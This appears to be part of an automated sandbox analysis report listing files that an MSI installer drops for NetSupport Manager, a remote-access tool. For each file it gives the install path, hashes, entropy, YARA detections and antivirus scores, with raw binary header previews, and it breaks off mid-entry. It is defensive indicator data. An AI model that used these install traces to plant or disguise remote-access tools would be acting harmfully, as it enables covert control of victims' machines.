                                                                                                                    SSDEEP:12288:mKM5hHCLsEy4GJNo7Tff0eKsrdKvaj3IzWGLqD9AFPOy0EuEIBy14sYMwWiy8BaR:mKwhHCLsEy+EeKsUvUvGLkqD0ab47MVF
                                                                                                                    MD5:FEE6C10F16BB7A3DC448BF8111386867
                                                                                                                    SHA1:50864E624F0DB04B22C9D418D55AE2413FBEDF42
                                                                                                                    SHA-256:488772E8649C350CD950DCF847786293034371208C297E1E151CF17BF384DD2F
                                                                                                                    SHA-512:557E0FF6CA34353A30B0F77585905648FA0C1C0824367B0EBDDFC9DA5B57CA7952AA23AEED961EF0163A4A87CE8C267C47050614A74BBB66148E82F8094335D4
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIIMAGE.DLL, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................1q......w.....j.....z......o..\.....C.`....B....Y.....r......s......t....Rich...................PE..L...2.oe...........!......................................................................@.........................P................`..4............H...]...p..,?.. ................................................................................text..._........................... ..`.rdata..$@.......B..................@..@.data....l.......6..................@....rsrc...4....`......................@..@.reloc..P@...p...B..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIMSG.DLL

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):56288
                                                                                                                    Entropy (8bit):5.934323135362062
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:j8OV1u6Jr2pe/6QHDHf/ckSCr2pe/DryHDHf/ckI:jRee/RjHpee/KjH0
                                                                                                                    MD5:5758E67FBD1984B6E43648C8568FB4EE
                                                                                                                    SHA1:6C1CD32D27EA2719668FE1ADEBDD8AF626814007
                                                                                                                    SHA-256:2723D3EC822F369E1C083085335C86D9FD94367DDF36BB2047BBCE0DAE59AA7D
                                                                                                                    SHA-512:C3743E4499509E384E00C14C0C5467A0C2F337201C868A1426010F5A086F3B5C74A4E97D006042835902E0332D2833FCCD30ECFA9DD8D17F3AB109976B5AC6B1
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}.................................Rich....................PE..L.....oe...........!.........x............... .... .................................x.....@.......................................... ...v...........~...]...........................................................................................text............................... ..`.rsrc....v... ...x..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIRES.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2976736
                                                                                                                    Entropy (8bit):7.559871297074836
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:49152:tl4QLOK6L9jK36nyJrqfz2BJ24PomOTLuXUddgoo4J2:tl4W6L9jO6oGKBJqLuXUAojJ2
                                                                                                                    MD5:62629F14DF2B43A013EA9FE115CBB008
                                                                                                                    SHA1:35F7220685F4A32AA43A43A382C9D4523F6C5D0C
                                                                                                                    SHA-256:D617C40A780E21CDBE062C305370655437F5CBF5FF4F84D09E4FCC3F81133561
                                                                                                                    SHA-512:B95360929507CCF02B90362AD42042546F4B992831F551EA17DCEBF8BC7C5FC7F0604013C5781A3B5442AEA3B56B4B105BF3651EA0A0B0568F4BBD1677398D6F
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIRES.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x.d.<`..<`..<`..S....`..S...,`..5...?`..<`..r`..S..._`..S...=`..S...=`..Rich<`..........PE..L.....oe...........!.....l....+..... ........................................P-......-...@.....................................(....0..P.*...........-..]....-.t.......................................@............................................text....k.......l.................. ..`.rdata..Tw.......x...p..............@..@.data....,..........................@....rsrc...P.*..0....*.................@..@.reloc..PF....-..H....,.............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIVDD.DLL

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):44576
                                                                                                                    Entropy (8bit):5.569926928492802
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:kFPPr2pe/b2ZHDHf/ckwlp6r2pe/ijHDHf/ckm:khDee/YjHUCee/ejHS
                                                                                                                    MD5:2FF563D9CF8AFABBADF04009667B0FFF
                                                                                                                    SHA1:335EE10CC1A6B52219EFDC6B765A4820594BF928
                                                                                                                    SHA-256:D9F1FD8CAEE025BBC4193B9F2637E8577D51DE3129C5E9541B6CBDC02B4F98E6
                                                                                                                    SHA-512:26948D04ED4920FF9A77CCB8A2333038F7EEF0F59E8889A2B6DAE34350537A22C0D687F7F2EA2DB5B1AF8DCDB120EBBB683801FF8C026BC42DC167B22001E964
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIVDD.DLL, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?1j.{P..{P..{P..{P..aP..{P..iP...XY.|P..Mv..yP...p..zP..Rich{P..........PE..L.....oe...........!.........0...... ........ ...............................P.......b..............................P$..e.... ..d...................@P...]...@....... ............................................... ...............................text...\........................... ..`.rdata....... ....... ..............@..@.data........0.......0..............@....reloc.......@.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIhtmlgen.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2891744
                                                                                                                    Entropy (8bit):6.679546690054984
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:49152:dbpvdeyqfF2Mbwnij1QdEdJh2skJxwj934JFCb4l5uUPyWWuDQIlF7zePcFtFc6R:d98fdbwniqdEfh2skJxwj934FCb88UP3
                                                                                                                    MD5:F7642B7DE834924F1470830D214D9D53
                                                                                                                    SHA1:C816AA12D0E64D6B89AF134D4EE8339FB547E502
                                                                                                                    SHA-256:D4083381EA6F1364137F5F7DEF093CEF5554718F37299B0A8832BE622F0F74C6
                                                                                                                    SHA-512:5E128EBD6392A84715E18C405E8502E0B5DAC2DDE64F88919911F854F2C60A8AE1FC24FFF3429270960564882D18471104E66DF68267D1C5F7374732F44B8BD2
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIhtmlgen.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.@..r...r...r..v...Xr...r/.wq..v...tr......Tr.......r.......s......~r......~r......~r..Rich.r..........PE..L...u.oe...........!.....D ..z...............` ..............................p,.....s.,...@...........................(.n....>(.......).,.............+..]....).....Pp ...............................%.@............` .l............................text....C ......D ................. ..`.rdata... ...` .."...H .............@..@.data...H.....(......j(.............@....rsrc...,.....).......).............@..@.reloc..P.....).......).............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIinv.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2934240
                                                                                                                    Entropy (8bit):6.695777901099138
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:49152:lp3sVlUmDVC4SxoOQnIfZVuLDo1f80nW2rzVtn11wZRNMobc2QSBa4sHsYbf5f5e:iUmDvbO1fZVeDo1f80nW2rzVmZnMClQu
                                                                                                                    MD5:0830B115A3595DBB15A5C153AA17DB44
                                                                                                                    SHA1:1B3D19542C25E74E95024F2EBA1F5C3373316AB2
                                                                                                                    SHA-256:FCF7B187FF10860C26CBF999C726475C3E12CE27D7CA3D70388AA25B286D4C1E
                                                                                                                    SHA-512:D22DDFFF15A0654DBD7B49B7255EB8BB01C4D3EA149DC3B586468CCA4447940C249319664CA68BBAC07857D5BBEDBCC02D7AC62B0C432763EEC2AE399AA5225B
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIinv.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`..................................... ......O.....................Rich...........PE..L.....oe...........!...... ..........+........!..............................`-.......-...@.........................@;).t.....(.......*.4............h,..]....*. ...0.!.............................h.%.@.............!.L...,.(.@....................text..... ....... ................. ..`.rdata...;....!..<.... .............@..@.data....B...@)......").............@....rsrc...4.....*.......).............@..@.reloc........*.......).............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\StoreInvDll.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):92640
                                                                                                                    Entropy (8bit):6.734732819126988
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:cqDAGQoJ0iJ0FG6C2uIHI5oskMfzNUbImR4NB+iOfGdVUdTee/njHlee/RjHV:BPQoLJnl2umI5osrzibImR4NBjOfGdVm
                                                                                                                    MD5:05835B95CA60D3B36412E006AD2FDD0E
                                                                                                                    SHA1:1D558CBE48BF0C5FB91C62E02A09201A0C6A406A
                                                                                                                    SHA-256:35B518AE2E1BBE963F9CD996A566C00A6825B52A01A08AF52B642363B33B96BE
                                                                                                                    SHA-512:AF28C3631627246C022515339D5C3B6A62D0B83C5CB54F918DF3EA88ED6439BF5E8BABC2E92EE105EDF31394E97948D8F87D44F7C9DBFD9EE3984023A14EE383
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\StoreInvDll.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E......[...[...[...[...[n.([...[n..[...[n..[...[n.*[...[...[G..[..%[...[..2[...[n..[...[n.-[...[n.,[...[n.+[...[Rich...[........................PE..L.....oe...........!.........t......t........................................@............@.............................t...............H................]... ..$......................................@............................................text...n........................... ..`.rdata..4N.......P..................@..@.data...............................@....rsrc...H...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\Support\client32.1_2024_11_22_203841_080.dmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                                                    File Type:Mini DuMP crash report, 12 streams, Sat Nov 23 01:38:42 2024, 0x200000 type
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):405674
                                                                                                                    Entropy (8bit):2.439820589258604
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:976gvKHMcFQkcEl1Vw0J2A4bEowjmlJ3l6sLcn:hpKHMWjcYJJtowClJ3l6sI
                                                                                                                    MD5:7096ACD884DF8AC53721E984B4C50E6E
                                                                                                                    SHA1:D50DD83E2EB6454C1065728AFA25E7B8E2B42698
                                                                                                                    SHA-256:F60003CA98976E280A4EF9672C2F9C17EB6C9686AD8B1CE907CA5922F41ADD95
                                                                                                                    SHA-512:9FD788B7D6FA4C1CB006707E8EF2099ACA1085FE1FE076B24BCC6748929B7CBE81AA8C863EEA8E97643F07BDDE0213464796858DD24EFEAD6E139DCEC33CC294
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\Support\client32.1_2024_11_22_203841_080.dmp, Author: Joe Security
                                                                                                                    Preview:MDMP..a..... ......."2Ag.. .....................D/..............~...........<.......8...........T...............(=...........?..................................................................eJ.......?......GenuineIntel........P.oT............2Ag.............................@..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\TCCTL32.DLL

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):471008
                                                                                                                    Entropy (8bit):6.6933780240823175
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:7+MEmCOirSwXCHVs5QroHNgstVJ9lf8Mu3qyPKLK/:7+MEp5IsV4Mu6yPK4
                                                                                                                    MD5:0F0C9E34BABB2BA2036E9A4CD4F70FEB
                                                                                                                    SHA1:5EFB10AFCA796CC5699A79AB49FF56AC92BEDE25
                                                                                                                    SHA-256:BE063E964439510E9303BF0CC03E5CDA3169A5E115609519A608D1BF05705EA5
                                                                                                                    SHA-512:C4716B2BBFBC92C6D39013911DF923EDF2EAB7C460193EB8C3BC121E5EC58850E54E8E3B4C8B71FCD4FEBC308FABDA65AE2A91BED10006029CD40F6DB504B960
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\TCCTL32.DLL, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E...+...+...+......+...*...+......+......+.....+......+......+......+.Rich..+.........................PE..L...g.af...........!.....Z...t......xR.......p...............................p.......B....@..........................s.......f..........@................]... ...I...r...............................G..@............p...............................text....X.......Z.................. ..`.rdata..i....p.......^..............@..@.data................f..............@....rsrc...@............~..............@..@.reloc...J... ...L..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWVI.DLL

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):206304
                                                                                                                    Entropy (8bit):6.814671479498648
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:mCAq0fb1suXPEToF+HauQ0wpiEAOseIeN:PiRsu8ToEHnQ0wC8xN
                                                                                                                    MD5:A314D8185FCEF3D4B3B01542991B8AF4
                                                                                                                    SHA1:CCE615B170CED2D4C15D073EF0F60D1FA83FC845
                                                                                                                    SHA-256:04C0240CA1F248472CB080E873B88BF79F60E5894B1118DCC8DAB33A13C505A1
                                                                                                                    SHA-512:9F6DC292AA94D4579EE9949DA4E68693B2CE21F43D77CF8F9AEA09E7F40CF16F0C131F29DAB9AE78A9D059F076BFF65C95D20A971AEE7E7E651F55376A0132C5
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWVI.DLL, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........9..yj..yj..yj...j..yj..j..yj..j..yj..xj..yj...j..yj...j..yj...j..yj...j..yj...j..yjRich..yj........................PE..L.....oe...........!.....*...........Y.......@............................... .......|..............................`...........d.......\................]...........A..............................xy..@............@..l............................text....).......*.................. ..`.rdata..&a...@...b..................@..@.data...|3..........................@....rsrc...\...........................@..@.reloc..l...........................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWXP.DLL

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):45536
                                                                                                                    Entropy (8bit):7.0739520347335105
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:uPReRnverIpOBvrs+onaJQJdTFc/4BdOnDhdHu4quUr2pe/CjSHDHf/ckY4r2pe8:sR6verIpyvrFo6Q9c/EdOnXu410ee/CL
                                                                                                                    MD5:E36489E8AACE1404DC78794A10E3458A
                                                                                                                    SHA1:CD49AE49F2DF49915BA838766D803A9CBA5CCB65
                                                                                                                    SHA-256:C85614EEEE02F6CE19789B9A8259EE1CC020F6F635EC66AABB26500F0F70F653
                                                                                                                    SHA-512:3B2CAFA80B4B3F2CD83D5DB9B6E4C9E7032605E59671CAB172C11D17268D772A02B5EBB5B14490823497E221E7586D713D61FE0C6312F8FEE7514ACDC71C00DB
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWXP.DLL, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5..JT..JT..JT..%"j.NT....n.KT..%"h.IT..%"\.GT..C,e.MT..JT..sT..%"].BT..|r..KT..%"m.KT..%"l.KT..%"k.KT..RichJT..................PE..L.....oe...........!.....*...&.......0.......@......................................X.....@..........................T..}....M..x....p..\............T...]...........A...............................D..@............@...............................text...%(.......*.................. ..`.rdata..}....@......................@..@.data........`.......D..............@....rsrc...\....p.......F..............@..@.reloc...............N..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\WINSTALL.EXE

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):763872
                                                                                                                    Entropy (8bit):6.574853256300612
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:UwBfoW/SGOLyn5PmPgLmkgM2uyIXEFH9YI/WIvSGvmm5s3qGGaG6rn5ax77/v10E:F6IqkgM2uyIqH93/WIvOqMR/YfMl2eTS
                                                                                                                    MD5:0FCF65C63E08E77732224B2D5D959F13
                                                                                                                    SHA1:5419B79FE14E21D1D5B51FE8187F7B86EC20DE74
                                                                                                                    SHA-256:F3E587F94A79C46A603B39286E93B17FABC895C6B71B26B0FC5D812CF155B7E5
                                                                                                                    SHA-512:7C289AAF3AC1B998C8CA9593A58C8AA3A9AA9F41852C1ED4192B908E0AD51871400D585B4FE508D49368BDFC7378807D289971914870A7A47B0410A946E5E381
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\WINSTALL.EXE, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)..H.H.H.3.l..H..>j..H.0w..H.0g..H.H..>I..>^..H..>_..H..>o..H..>n..H..>i..H.Rich.H.................PE..L.....oe.................t........................@..........................0............@..........................c.......@..,....P..(Y...........J...]......Lo.. ...................................@...............\....=..@....................text....s.......t.................. ..`.rdata..t............x..............@..@.data...@....p...0...N..............@....rsrc...(Y...P...Z...~..............@..@.reloc...p.......r..................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\WdfCoInstaller01005.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1419232
                                                                                                                    Entropy (8bit):7.97986719531702
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24576:M3Nqv+8N7hdPgL8hKnCThLv7AEeRP/HM8Z4Sx5cTI25oWOQt:M82A7/PjACTFAEgb7bmos
                                                                                                                    MD5:F9CF2DB8B99DC50EAB538C4D860AC1A4
                                                                                                                    SHA1:B261C9E7F082EB8649AFAB9A677E022F84FD2823
                                                                                                                    SHA-256:865864A32AEE78E588764F37847522FDB0BD1940ECD73B3C49D8F68B4D5BAD71
                                                                                                                    SHA-512:59660740B58B1761A4658AEB02F669F1FD8A3FCB07C162A86B9565C5F9219CB993CC9D94B43B1D39EDCD5032B478B8A9B3A388FB82449CA82A83E3C6DD94C02D
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*qQ.n.?.n.?.n.?.I.B.i.?.n.>...?.I.D.}.?.I.Q.a.?.I.E.o.?.I.R.).?.I.A.o.?.I.C.o.?.I.G.o.?.Richn.?.................PE..L.../.IE...........!...............................................................a.....@.........................0................ ..p...........................................................0`..@............................................text............................... ..`.data....G..........................@....rsrc...p.... ......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\_Data.lnk

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\Installer\MSI3FCC.tmp
                                                                                                                    File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1720
                                                                                                                    Entropy (8bit):2.3227854145782407
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:8CCLDWLjKwbwG1r+LGMvO4uRQq+LGqey:8CeCjKwbwG16LGmeQzLG
                                                                                                                    MD5:5C0DD68CE0488DE7A867E429607D8A14
                                                                                                                    SHA1:383669B275B3B72A572F8D73A4A01528FFEAAB18
                                                                                                                    SHA-256:5377DBDC5FEBFAA6D3EDB2CC3DA05F63BC38E3B3D96E2A3EB6B24C8DCE6D2134
                                                                                                                    SHA-512:270853B6DB97D95BDC9F9498F6AC00C96480A4701BEF839E998F1580F42E70390B32F7EC1EE5B54E0F393C80C05DF9D1F8EEB4ABB2872E9A564C7148DD872E81
                                                                                                                    Malicious:false
                                                                                                                    Preview:L..................F........................................................S....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....`.1...........NetSupport..F............................................N.e.t.S.u.p.p.o.r.t.....x.2...........NetSupport Manager..V............................................N.e.t.S.u.p.p.o.r.t. .M.a.n.a.g.e.r..."...B.....\.....\.....\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.N.e.t.S.u.p.p.o.r.t.\.N.e.t.S.u.p.p.o.r.t. .M.a.n.a.g.e.r.........%USERPROFILE%\AppData\Roaming\NetSupport\NetSupport Manager..............................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\_Shared Data.lnk

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\Installer\MSI3FCC.tmp
                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Directory, ctime=Sat Nov 23 00:38:35 2024, mtime=Sat Nov 23 00:38:35 2024, atime=Sat Nov 23 00:38:35 2024, length=0, window=hide
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1575
                                                                                                                    Entropy (8bit):3.0189266771856906
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:8KCcn9cHi19GOAoC7LGMSELGPpLDsIBm:8KTyHY9GVl7LGpELGPJsa
                                                                                                                    MD5:34F81FDAF652062EF0F7B9D36E3A528B
                                                                                                                    SHA1:FB1E0C9C771D31C6B4FBF5F9C12989FBC61DE4D4
                                                                                                                    SHA-256:18C0ABCE3DB96C17158FE59F374C9BC1952CA3FA67CA5192D2879B1EA4805B92
                                                                                                                    SHA-512:380877EEEF6ECEBAE04297679D835DE6B0E1F89D4B7AB44509D94BA4716DA2C354F340A0EAB0C906C772BD78EB26009E148D31C52FC92690768D5877A3774ACB
                                                                                                                    Malicious:false
                                                                                                                    Preview:L..................F..... ....UiH=..anWiH=....UiH=..........................[....P.O. .:i.....+00.../C:\...................`.1.....wY... PROGRA~3..H......O.IwY......g.......................~.P.r.o.g.r.a.m.D.a.t.a.....^.1.....wY... NETSUP~1..F......wY..wY..............................|.N.e.t.S.u.p.p.o.r.t.....n.1.....wY... NETSUP~1..V......wY..wY..............................~.N.e.t.S.u.p.p.o.r.t. .M.a.n.a.g.e.r.......[...............-.......Z..............K.....C:\ProgramData\NetSupport\NetSupport Manager..2.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.N.e.t.S.u.p.p.o.r.t.\.N.e.t.S.u.p.p.o.r.t. .M.a.n.a.g.e.r.........%ProgramData%\NetSupport\NetSupport Manager.........................................................................................................................................................................................................................%.P.r.o.g.r.a.m.D.a.t.a.%.\.N.e.t.S.u.p.p.o.r.t.\.N.e.t.S.u.p.p.o.r.t. .M.a.n.a.g.e.r.............................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-console-l1-1-0.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):19136
                                                                                                                    Entropy (8bit):6.960788331628294
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:bvmMWVghW/ivSx9YOCAs/nGfe4pBjSf+GEOWNArXVWQ4mWPQ4mqnajxcRGlPMRdk:XW2hWKSUA0GftpBjxDib4mll7PedGSk
                                                                                                                    MD5:37DA7F6961082DD96A537235DD89B114
                                                                                                                    SHA1:DAA1E2E683FA0512FF68EB686D80B4AA3B42E5B6
                                                                                                                    SHA-256:6EE46C6B6727EB77BCBCDD54DC506680CA34AF7BC7CA433B77775DE90358844E
                                                                                                                    SHA-512:AF4F28E3319344D2E215F56026E9CEE5C951B5C44374C7EEEA6790D18F174D7E785CEACBBF1450D5CA1D76F207B5F7B4F24674468F30BE84C6C3E90C48CE2A2C
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................+............ ...................<..............8............................................................................text...;........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-datetime-l1-1-0.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18624
                                                                                                                    Entropy (8bit):6.97464085764015
                                                                                                                    Encrypted:false
